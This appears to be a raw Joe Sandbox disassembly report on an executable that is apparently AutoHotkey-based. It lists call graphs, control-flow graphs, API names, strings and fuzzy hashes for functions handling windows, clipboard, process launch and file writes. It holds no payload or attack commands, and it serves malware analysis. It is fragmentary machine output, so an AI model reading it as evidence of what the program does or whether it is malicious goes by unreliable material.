62 API calls 244001->244002 244003 14001f78e __initmbctable 244002->244003 244004 14001f79d 244003->244004 244005 14001f7c7 SetTimer 244003->244005 244004->243871 244006 14001f806 GetTickCount 244005->244006 244012 14001f7f9 244005->244012 244007 14001f861 GetTickCount 244006->244007 244008 14001f83a SetTimer 244006->244008 244223 140032520 244007->244223 244008->244007 244010 14001f910 __initmbctable _RunAllParam 244015 14001f9de 244010->244015 244017 14001f9ff 244010->244017 244012->244010 244234 1400cb11c 62 API calls 2 library calls 244012->244234 244013 14001f8ab KillTimer 244013->244012 244235 1400b14e0 94 API calls 3 library calls 244015->244235 244018 14001fa35 244017->244018 244019 14001fa25 244017->244019 244021 14001fa6c 244018->244021 244023 14001fa80 244018->244023 244027 14001f9fa __initmbctable 244018->244027 244236 1400060c0 21 API calls 2 library calls 244019->244236 244237 1400b1b90 62 API calls free 244021->244237 244024 14001fadf 244023->244024 244023->244027 244030 14001fac2 244023->244030 244025 1400aa400 73 API calls 244024->244025 244025->244027 244026 14001fbea 244026->244027 244029 1400ca9a4 malloc 62 API calls 244026->244029 244027->243871 244029->244027 244030->244026 244030->244027 244238 1400cb11c 62 API calls 2 library calls 244030->244238 244032 140063e0c GetCurrentDirectoryW 244031->244032 244032->243924 244033->243925 244035 140005df4 244034->244035 244044 140005a30 __initmbctable 244034->244044 244036 14002e290 62 API calls 244035->244036 244038 140005ded 244036->244038 244038->243933 244039 14002e290 62 API calls 244039->244044 244043 1400aa400 73 API calls 244043->244044 244044->244035 244044->244038 244044->244039 244044->244043 244046 1400ca9a4 malloc 62 API calls 244044->244046 244065 1400cafcc 89 API calls 4 library calls 244044->244065 244066 1400b14e0 94 API calls 3 library calls 244044->244066 244067 1400060c0 21 API calls 2 library calls 244044->244067 244068 1400b1b90 62 API calls free 244044->244068 244069 1400cb11c 62 API calls 2 library calls 244044->244069 244046->244044 244048 1400a4e5d _wcsupr_s_l 244047->244048 244049 1400cbd40 73 API calls 244048->244049 244051 1400a4ed9 244049->244051 244050 140005626 244050->243930 244053 1400b1860 244050->244053 244051->244050 244070 1400a52e0 119 API calls 2 library calls 244051->244070 244054 1400b1876 244053->244054 244055 1400b18ed 244054->244055 244071 1400cb11c 62 API calls 2 library calls 244054->244071 244055->243941 244058 1400ae480 _wcsupr_s_l 244057->244058 244059 1400ae49c __initmbctable 244058->244059 244072 1400ae260 244058->244072 244059->243949 244061->243942 244062->243942 244063->243933 244064->243936 244065->244044 244066->244044 244067->244044 244068->244044 244069->244044 244070->244050 244071->244055 244074 1400ae283 __initmbctable 244072->244074 244073 1400ae3db 244076 1400ae3e1 FindFirstFileW 244073->244076 244079 1400ae2da __initmbctable 244073->244079 244074->244073 244075 1400ae360 FindFirstFileW 244074->244075 244074->244079 244077 1400ae37e FindClose 244075->244077 244075->244079 244078 1400ae3f9 FindClose 244076->244078 244076->244079 244077->244074 244077->244079 244078->244079 244079->244059 244081 1400208f1 244080->244081 244082 14002082c SizeofResource 244080->244082 244081->243964 244082->244081 244083 140020843 LoadResource 244082->244083 244083->244081 244084 140020857 LockResource 244083->244084 244084->244081 244085 14002086e 244084->244085 244086 1400cbd40 73 API calls 244085->244086 244087 140020878 244086->244087 244090 140020885 244087->244090 244099 14001e550 GetCPInfo 244087->244099 244089 1400208c8 244089->243964 244090->244089 244092 1400aab70 244090->244092 244093 1400aab9b GetCPInfo 244092->244093 244094 1400aabb0 244092->244094 244093->244094 244096 1400aac65 244094->244096 244097 1400aabe7 244094->244097 244100 1400aa8c0 244094->244100 244096->244089 244097->244096 244098 1400aac57 GetCPInfo 244097->244098 244098->244096 244099->244090 244101 1400aa8d9 244100->244101 244103 1400aa8e0 244100->244103 244102 1400ca9a4 malloc 62 API calls 244101->244102 244102->244103 244103->244097 244105 14001f403 244104->244105 244106 14001efae _fltin2 244104->244106 244105->243980 244106->244105 244133 1400af3a0 244106->244133 244109 1400af3a0 13 API calls 244110 14001f045 LoadCursorW RegisterClassExW 244109->244110 244111 14001f0a0 RegisterClassExW 244110->244111 244117 14001f0c7 244110->244117 244112 14001f0eb GetForegroundWindow 244111->244112 244111->244117 244113 14001f12d CreateWindowExW 244112->244113 244114 14001f0fe GetClassNameW 244112->244114 244113->244117 244118 14001f1ab 244113->244118 244114->244113 244116 14001f119 244114->244116 244153 1400ca91c 62 API calls 2 library calls 244116->244153 244117->243980 244120 14001f1f1 CreateWindowExW 244118->244120 244121 14001f1b4 GetMenu EnableMenuItem 244118->244121 244120->244117 244124 14001f288 9 API calls 244120->244124 244122 14001f1ea 244121->244122 244123 14001f1dd 244121->244123 244122->244120 244154 14001f500 EnableMenuItem EnableMenuItem EnableMenuItem EnableMenuItem 244123->244154 244126 14001f3b3 LoadAcceleratorsW 244124->244126 244127 14001f38d ShowWindow SetWindowLongW 244124->244127 244128 14001f3de 244126->244128 244129 14001f3d5 244126->244129 244127->244126 244155 14001f560 Shell_NotifyIconW _fltin2 wcsncpy 244128->244155 244129->244117 244131 14001f3ef 244129->244131 244156 14001f410 PostMessageW SetClipboardViewer ChangeClipboardChain 244131->244156 244134 1400af3cd LoadLibraryExW 244133->244134 244136 1400af3de 244133->244136 244134->244136 244135 1400af591 244139 1400af5c2 ExtractIconW 244135->244139 244140 14001f01c GetSystemMetrics 244135->244140 244136->244135 244137 1400af40e EnumResourceNamesW 244136->244137 244138 1400af402 244136->244138 244137->244138 244141 1400af44f FindResourceW 244138->244141 244142 1400af577 244138->244142 244139->244140 244140->244109 244141->244142 244143 1400af467 LoadResource 244141->244143 244142->244135 244144 1400af59b FreeLibrary 244142->244144 244143->244142 244145 1400af47c LockResource 244143->244145 244144->244135 244145->244142 244146 1400af491 244145->244146 244147 1400af49c GetSystemMetrics 244146->244147 244148 1400af4a7 244146->244148 244147->244148 244148->244142 244149 1400af509 FindResourceW 244148->244149 244149->244142 244150 1400af523 LoadResource 244149->244150 244150->244142 244151 1400af534 LockResource 244150->244151 244151->244142 244152 1400af545 SizeofResource CreateIconFromResourceEx 244151->244152 244152->244142 244153->244113 244155->244129 244156->244117 244158 14000a877 244157->244158 244167 14000aa08 244157->244167 244159 14000a8a3 244158->244159 244160 14000bad0 244158->244160 244161 14000a8b0 PostThreadMessageW 244159->244161 244160->243995 244162 14000a8db GetTickCount 244161->244162 244163 14000a8cb Sleep 244161->244163 244164 14000a8f0 GetExitCodeThread 244162->244164 244163->244161 244163->244162 244165 14000a912 GetTickCount 244164->244165 244166 14000a92b CloseHandle 244164->244166 244168 14000a921 Sleep 244165->244168 244169 14000a944 244165->244169 244218 14000c160 62 API calls free 244166->244218 244178 14000ab84 244167->244178 244183 1400ca9a4 malloc 62 API calls 244167->244183 244195 14000aaa5 _fltin2 244167->244195 244168->244164 244171 14000a96c 244169->244171 244172 14000a94d 244169->244172 244174 14000a985 244171->244174 244175 14000a971 CloseHandle 244171->244175 244173 14000a952 CreateMutexW 244172->244173 244172->244174 244173->244174 244176 14000a9ae 244174->244176 244177 14000a98e 244174->244177 244175->244174 244181 14000a9b4 CloseHandle 244176->244181 244184 14000a9c8 244176->244184 244180 14000a994 CreateMutexW 244177->244180 244177->244184 244179 14000c1d9 244178->244179 244222 1400cb11c 62 API calls 2 library calls 244178->244222 244179->243995 244180->244184 244181->244184 244185 14000aa92 244183->244185 244184->243995 244184->244160 244185->244178 244185->244195 244187 14000b7ee 244189 14000b7f6 CreateThread 244187->244189 244190 14000b83c 244187->244190 244188 14000affb 244188->244160 244188->244187 244188->244188 244191 14000b82e SetThreadPriority 244189->244191 244201 14000b8cd 244189->244201 244192 14000b843 PostThreadMessageW 244190->244192 244191->244190 244193 14000b86e GetTickCount 244192->244193 244194 14000b85e Sleep 244192->244194 244200 14000b880 244193->244200 244194->244192 244194->244193 244195->244188 244219 140006880 62 API calls 244195->244219 244196 14000b889 PeekMessageW 244199 14000b970 GetTickCount 244196->244199 244196->244200 244197 14000b94e GetExitCodeThread 244198 14000b990 CloseHandle 244197->244198 244197->244199 244209 14000b9b0 244198->244209 244202 14000b983 Sleep 244199->244202 244215 14000ba15 244199->244215 244200->244196 244200->244197 244200->244215 244201->244160 244220 1400cb11c 62 API calls 2 library calls 244201->244220 244202->244200 244203 14000ba45 244207 14000ba5e 244203->244207 244208 14000ba4a CloseHandle 244203->244208 244204 14000ba26 244206 14000ba2b CreateMutexW 244204->244206 244204->244207 244206->244207 244210 14000ba88 244207->244210 244211 14000ba68 244207->244211 244208->244207 244209->244215 244221 1400cb11c 62 API calls 2 library calls 244209->244221 244210->244184 244213 14000ba8e CloseHandle 244210->244213 244211->244184 244212 14000ba6e CreateMutexW 244211->244212 244212->244184 244213->244184 244215->244203 244215->244204 244216->243996 244217->243993 244218->244169 244219->244195 244220->244184 244221->244215 244222->244179 244231 14001f899 244223->244231 244232 14003259d 244223->244232 244224 140032601 GetTickCount 244227 140032620 PeekMessageW 244224->244227 244224->244232 244225 1400325da GlobalUnlock 244226 1400325ee CloseClipboard 244225->244226 244226->244224 244228 140032649 GetTickCount 244227->244228 244227->244232 244228->244232 244229 140032701 GetTickCount 244229->244232 244230 14008a1a0 166 API calls 244230->244232 244231->244012 244231->244013 244232->244224 244232->244225 244232->244226 244232->244228 244232->244229 244232->244230 244232->244231 244233 140032520 166 API calls 244232->244233 244233->244232 244234->244010 244235->244027 244236->244027 244237->244027 244238->244026

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 140056130-14005615b 1 14005615d-140056173 RegisterWindowMessageW 0->1 2 140056179-14005618a 0->2 1->2 3 1400561dc-1400561e7 2->3 4 14005618c-140056193 2->4 7 1400561ef-140056206 3->7 8 1400561e9-1400561ec 3->8 5 140056195-14005619c 4->5 6 14005619e-1400561a5 4->6 5->3 5->6 6->3 9 1400561a7-1400561c9 call 1400045f0 6->9 10 14005636a-140056371 7->10 11 14005620c 7->11 8->7 28 1400561d5 9->28 29 1400561cb-1400561d0 9->29 13 140056377 10->13 14 1400568fe-140056905 10->14 15 140056212-14005621a 11->15 16 14005634d-14005635d call 140056d40 11->16 21 1400568b3-1400568bd 13->21 22 14005637d-140056384 13->22 23 1400569b9-1400569c4 14->23 24 14005690b 14->24 17 140056825-14005682c 15->17 18 140056220-140056236 15->18 25 14005686e-14005687a DefWindowProcW 16->25 37 140056363-140056365 16->37 17->25 26 14005682e-140056835 17->26 18->16 30 1400568bf-1400568c8 21->30 31 1400568ca-1400568cd 21->31 32 14005638a 22->32 33 14005680b-140056812 22->33 23->17 34 1400569ca-1400569e0 23->34 35 140056948-14005694f 24->35 36 14005690d-140056914 24->36 45 140056880-140056888 25->45 26->25 44 140056837-140056848 Shell_NotifyIconW 26->44 28->3 46 140056890-1400568a9 29->46 30->45 47 140056941-140056943 31->47 48 1400568cf-1400568fc SendMessageTimeoutW 31->48 40 140056390-140056398 32->40 41 1400567ca-1400567fd GetMenu CheckMenuItem 32->41 42 140056818-14005681f 33->42 43 1400568aa-1400568b1 33->43 38 140056951-140056958 35->38 39 14005695a-140056977 PostMessageW 35->39 36->17 49 14005691a-140056932 PostMessageW call 140004ee0 36->49 37->45 38->39 51 14005697d-140056987 38->51 39->51 52 140056795-14005679c 40->52 53 14005639e-1400563a0 40->53 41->25 54 1400567ff-140056809 41->54 42->17 42->35 43->25 44->25 55 14005684a-140056867 Shell_NotifyIconW 44->55 45->46 47->45 48->45 49->47 62 140056934-14005693c call 140001a70 49->62 51->47 59 140056989-1400569b4 SendMessageTimeoutW 51->59 57 14005679e-1400567a5 52->57 58 1400567ab-1400567b5 52->58 60 1400563a6-1400563a9 53->60 61 14005677a-14005677d 53->61 54->25 55->25 57->25 57->58 58->25 64 1400567bb 58->64 59->45 60->17 65 1400563af-1400563b3 60->65 61->25 63 140056783-14005678a 61->63 62->47 63->47 67 140056790 63->67 68 1400567bd-1400567c5 ShowWindow 64->68 69 140056416-14005641d 65->69 70 1400563b5-1400563bf 65->70 67->62 68->45 69->25 73 140056423-14005642a 69->73 71 1400563c1-1400563c7 70->71 72 1400563fe-140056405 70->72 71->68 74 1400563cd-1400563f9 MoveWindow 71->74 72->25 75 14005640b-14005640f 72->75 73->25 76 140056430-14005643a 73->76 74->45 75->76 77 140056411 75->77 78 140056441-140056444 76->78 77->25 79 140056446-14005644f 78->79 80 140056451-140056459 78->80 79->78 79->80 81 140056492 80->81 82 14005645b-14005646c 80->82 83 140056499-1400564a7 81->83 84 140056470-140056473 82->84 85 1400564ad-1400564b1 83->85 86 14005668c-140056698 83->86 87 140056475-14005647e 84->87 88 140056480-140056483 84->88 89 140056525-14005652c 85->89 90 1400564b3-1400564ba 85->90 91 1400566a3-1400566c5 GetClientRect 86->91 92 14005669a-14005669d 86->92 87->84 87->88 88->25 93 140056489-140056490 88->93 95 140056658-14005665c 89->95 96 140056532-140056537 89->96 90->25 94 1400564c0-1400564c7 90->94 97 1400566c7-1400566cd 91->97 98 1400566cf 91->98 92->47 92->91 93->83 99 1400564c9-1400564d0 94->99 100 1400564db-1400564de 94->100 95->25 103 140056662-140056687 GetClipBox FillRect 95->103 101 140056541 96->101 102 140056539-14005653f 96->102 104 1400566d2-1400566ee 97->104 98->104 99->25 105 1400564d6-1400564d9 99->105 106 1400564eb-1400564ff SetBkColor 100->106 107 140056544-140056552 101->107 102->107 103->45 108 140056734-140056775 MoveWindow InvalidateRect 104->108 109 1400566f0-1400566f7 104->109 105->100 110 1400564e0-1400564e5 GetSysColor 105->110 111 140056501-140056504 SetTextColor 106->111 112 14005650a-140056511 106->112 113 1400565b5-1400565db DrawIconEx 107->113 114 140056554-1400565b3 CreateCompatibleDC SelectObject BitBlt SelectObject DeleteDC 107->114 108->45 115 14005670e-140056715 109->115 116 1400566f9-140056708 MoveWindow 109->116 110->106 111->112 112->45 119 140056517-140056520 GetSysColorBrush 112->119 120 1400565e1-14005662b ExcludeClipRect CreateRectRgn GetClipRgn 113->120 114->120 117 140056717-14005672c MoveWindow 115->117 118 140056732 115->118 116->115 117->118 118->108 119->45 121 140056636-140056653 FillRgn DeleteObject 120->121 122 14005662d-140056630 GetSysColorBrush 120->122 121->45 122->121
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: MessageRegisterWindow
                            • String ID: $TaskbarCreated
                            • API String ID: 1814269913-2756569325
                            • Opcode ID: 502ea42f54506aedd61420d2f51a668baccd834887dd1654717699d76187291d
                            • Instruction ID: 1ef47505efe1a2c38c15dc43d22e269b7b58355a0c2051809d8268e627ce1eef
                            • Opcode Fuzzy Hash: 502ea42f54506aedd61420d2f51a668baccd834887dd1654717699d76187291d
                            • Instruction Fuzzy Hash: 1B2279312046408AEB6ACF63E4447EA77A1F78CBD4F544525EB8A57BB4DF3AD884CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Resource$Window$Load$Create$ClassShow$FindLockMenuMessageMetricsRegisterSendSystem$AcceleratorsCapsCursorDeviceEnableEnumFontForegroundFromIconItemLibraryLongNameNamesReleaseSizeof
                            • String ID: AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
                            • API String ID: 221421807-2636979444
                            • Opcode ID: f3c3a200fbb3d90f0f5accd5d359caaea26f68e31acef48725077e7251a11005
                            • Instruction ID: 113a3347b7f31ae7d4426fd89f3fc9adeb3451ee383df718cbdd0b9fc34b9b27
                            • Opcode Fuzzy Hash: f3c3a200fbb3d90f0f5accd5d359caaea26f68e31acef48725077e7251a11005
                            • Instruction Fuzzy Hash: 54C16B31218B8086E7668F22F8547DA73A4F78DB90F540115EB894BBB8DF3DC585CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessageTimerUnlock
                            • String ID: #32770
                            • API String ID: 1115112458-463685578
                            • Opcode ID: 7020c3aa795087f27f2b03cd4b81644c7e43635c03f437415a32140821466ec3
                            • Instruction ID: 3274dae97a1d8aa058c99df919bdd8a1851e4649d4f653935e0fcef3d63b232c
                            • Opcode Fuzzy Hash: 7020c3aa795087f27f2b03cd4b81644c7e43635c03f437415a32140821466ec3
                            • Instruction Fuzzy Hash: B4527FB220568486FB67CB27B8543E937A1F78DBD8F184115EB4A07AB5DB78C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
                            • String ID: Verb: <%s>$"%s" %s$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
                            • API String ID: 187721205-2616667029
                            • Opcode ID: eaaa51517441f1aee22f649f571258378f0e8d14f1603447bb328dac28ce8132
                            • Instruction ID: b7a67ef56e51752d9ae6ef37dccc32c8dcda095b879cb4e90b84f9bf47c3da64
                            • Opcode Fuzzy Hash: eaaa51517441f1aee22f649f571258378f0e8d14f1603447bb328dac28ce8132
                            • Instruction Fuzzy Hash: BD428C72300B8095EB669F2398403E927A1FB8CBE8F854225FF1957BE9DB38C645C344
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Window$Long$MessageRectSend$free$ClientDragFinishScreenShow
                            • String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$call
                            • API String ID: 1298873099-3963558559
                            • Opcode ID: 3dd19b711f2ae2d35ab0c1121cb385f87571d73cbc57190da53614e57cc86156
                            • Instruction ID: 1dea8da7f045ac1a7919f1dfa015aca2cca17758a6ca17a18e6ba3ed4863953d
                            • Opcode Fuzzy Hash: 3dd19b711f2ae2d35ab0c1121cb385f87571d73cbc57190da53614e57cc86156
                            • Instruction Fuzzy Hash: 2872C0B2604A848AEB67CF26E4447ED37A9F74CBD8F554225EB4A47BB8DB38C540C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1098 1400d2ac4-1400d2b0c call 1400d23b0 1101 1400d2b0e-1400d2b10 1098->1101 1102 1400d2b15-1400d2b18 1098->1102 1103 1400d31fa-1400d3223 call 1400d1920 1101->1103 1104 1400d2b1a-1400d2b2c call 1400ced8c call 1400ced6c call 1400ced04 1102->1104 1105 1400d2b39-1400d2b6f 1102->1105 1121 1400d2b31-1400d2b34 1104->1121 1106 1400d2b77-1400d2b7e 1105->1106 1107 1400d2b71-1400d2b75 1105->1107 1106->1104 1110 1400d2b80-1400d2b86 1106->1110 1107->1106 1107->1110 1113 1400d2b95-1400d2b9e call 1400d4ec4 1110->1113 1114 1400d2b88-1400d2b90 call 1400d4cf4 1110->1114 1122 1400d2e6e-1400d2e7f 1113->1122 1123 1400d2ba4-1400d2bb5 1113->1123 1114->1113 1121->1103 1125 1400d2e85-1400d2e8d 1122->1125 1126 1400d3183-1400d319f WriteFile 1122->1126 1123->1122 1124 1400d2bbb-1400d2beb call 1400ce858 GetConsoleMode 1123->1124 1124->1122 1145 1400d2bf1-1400d2bf3 1124->1145 1128 1400d2f5e-1400d2f62 1125->1128 1129 1400d2e93-1400d2e96 1125->1129 1130 1400d31a5-1400d31ab 1126->1130 1131 1400d2e58-1400d2e60 GetLastError 1126->1131 1133 1400d3040-1400d3043 1128->1133 1134 1400d2f68-1400d2f6b 1128->1134 1136 1400d31b9-1400d31cf 1129->1136 1137 1400d2e9c 1129->1137 1132 1400d3151-1400d3153 1130->1132 1131->1132 1141 1400d3159-1400d315b 1132->1141 1142 1400d31f4-1400d31f8 1132->1142 1133->1136 1143 1400d3049 1133->1143 1134->1136 1144 1400d2f71 1134->1144 1139 1400d31dc-1400d31ef call 1400ced6c call 1400ced8c 1136->1139 1140 1400d31d1-1400d31d6 1136->1140 1138 1400d2e9f-1400d2eab 1137->1138 1146 1400d2ead-1400d2eb6 1138->1146 1139->1121 1140->1101 1140->1139 1141->1136 1148 1400d315d-1400d3160 1141->1148 1142->1103 1149 1400d304f-1400d3054 1143->1149 1150 1400d2f76-1400d2f82 1144->1150 1151 1400d2bfe-1400d2c12 GetConsoleCP 1145->1151 1152 1400d2bf5-1400d2bf8 1145->1152 1155 1400d2edf-1400d2f23 WriteFile 1146->1155 1156 1400d2eb8-1400d2ec1 1146->1156 1158 1400d31ad-1400d31b4 call 1400cedac 1148->1158 1159 1400d3162-1400d3174 call 1400ced6c call 1400ced8c 1148->1159 1160 1400d3056-1400d305f 1149->1160 1161 1400d2f84-1400d2f8d 1150->1161 1153 1400d2e65-1400d2e69 1151->1153 1154 1400d2c18-1400d2c1b 1151->1154 1152->1122 1152->1151 1153->1141 1163 1400d2da5-1400d2da9 1154->1163 1164 1400d2c21-1400d2c40 1154->1164 1155->1131 1167 1400d2f29-1400d2f3f 1155->1167 1165 1400d2ece-1400d2edd 1156->1165 1166 1400d2ec3-1400d2ecb 1156->1166 1158->1121 1159->1121 1170 1400d3090-1400d30d8 WideCharToMultiByte 1160->1170 1171 1400d3061-1400d306e 1160->1171 1172 1400d2f8f-1400d2f9c 1161->1172 1173 1400d2fc1-1400d3005 WriteFile 1161->1173 1179 1400d2dab-1400d2daf 1163->1179 1180 1400d2db1-1400d2dcd 1163->1180 1176 1400d2c62-1400d2c6c call 1400cc380 1164->1176 1177 1400d2c42-1400d2c60 1164->1177 1165->1146 1165->1155 1166->1165 1167->1132 1178 1400d2f45-1400d2f53 1167->1178 1185 1400d30de 1170->1185 1186 1400d3179-1400d3181 GetLastError 1170->1186 1183 1400d3070-1400d3078 1171->1183 1184 1400d307c-1400d308e 1171->1184 1187 1400d2f9e-1400d2fa9 1172->1187 1188 1400d2fad-1400d2fbf 1172->1188 1173->1131 1175 1400d300b-1400d3021 1173->1175 1175->1132 1194 1400d3027-1400d3035 1175->1194 1210 1400d2c6e-1400d2c7b 1176->1210 1211 1400d2ca2-1400d2ca8 1176->1211 1195 1400d2cab-1400d2cb8 call 1400d52b4 1177->1195 1178->1138 1189 1400d2f59 1178->1189 1179->1180 1190 1400d2dcf 1179->1190 1191 1400d2dd4-1400d2dd8 1180->1191 1183->1184 1184->1160 1184->1170 1197 1400d30e0-1400d311d WriteFile 1185->1197 1193 1400d314c 1186->1193 1187->1188 1188->1161 1188->1173 1189->1132 1190->1191 1200 1400d2de0-1400d2def call 1400d78c0 1191->1200 1201 1400d2dda-1400d2dde 1191->1201 1193->1132 1194->1150 1198 1400d303b 1194->1198 1213 1400d2cbe-1400d2cfb WideCharToMultiByte 1195->1213 1214 1400d2e4f-1400d2e53 1195->1214 1204 1400d311f-1400d3126 1197->1204 1205 1400d312a-1400d3130 GetLastError 1197->1205 1198->1132 1200->1131 1221 1400d2df1-1400d2df7 1200->1221 1201->1200 1208 1400d2e1a 1201->1208 1204->1197 1206 1400d3128 1204->1206 1207 1400d3132-1400d3135 1205->1207 1206->1207 1207->1193 1215 1400d3137-1400d3146 1207->1215 1216 1400d2e1f-1400d2e27 1208->1216 1217 1400d2e2e-1400d2e46 1210->1217 1218 1400d2c81-1400d2c97 call 1400d52b4 1210->1218 1211->1195 1213->1214 1220 1400d2d01-1400d2d30 WriteFile 1213->1220 1214->1132 1215->1149 1215->1193 1216->1214 1222 1400d2e29 1216->1222 1217->1214 1218->1214 1229 1400d2c9d-1400d2ca0 1218->1229 1220->1131 1225 1400d2d36-1400d2d44 1220->1225 1221->1208 1224 1400d2df9-1400d2e12 call 1400d78c0 1221->1224 1222->1154 1224->1131 1233 1400d2e14-1400d2e16 1224->1233 1225->1214 1227 1400d2d4a-1400d2d54 1225->1227 1227->1216 1231 1400d2d5a-1400d2d8c WriteFile 1227->1231 1229->1213 1231->1131 1232 1400d2d92-1400d2d97 1231->1232 1232->1214 1234 1400d2d9d-1400d2da3 1232->1234 1233->1208 1234->1216
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
